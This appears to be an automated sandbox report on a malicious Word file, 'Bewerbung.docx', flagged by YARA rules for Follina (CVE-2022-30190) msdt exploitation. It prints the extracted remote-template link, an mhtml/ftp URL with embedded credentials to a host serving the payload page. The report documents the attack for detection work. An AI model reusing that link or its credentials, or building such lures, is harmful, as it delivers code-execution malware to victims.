Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: Bewerbung.docx ReversingLabs: Detection: 20%
Source: Bewerbung.docx Virustotal: Detection: 9%
Source: Bewerbung.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\Bewerbung.docx
Source: Bewerbung.docx OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$werbung.docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmp Jump to behavior
Source: classification engine Classification label: mal88.troj.expl.evad.winDOCX@1/17@0/1
Source: Bewerbung.docx OLE document summary: title field not present or empty
Source: Bewerbung.docx OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Bewerbung.docx Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs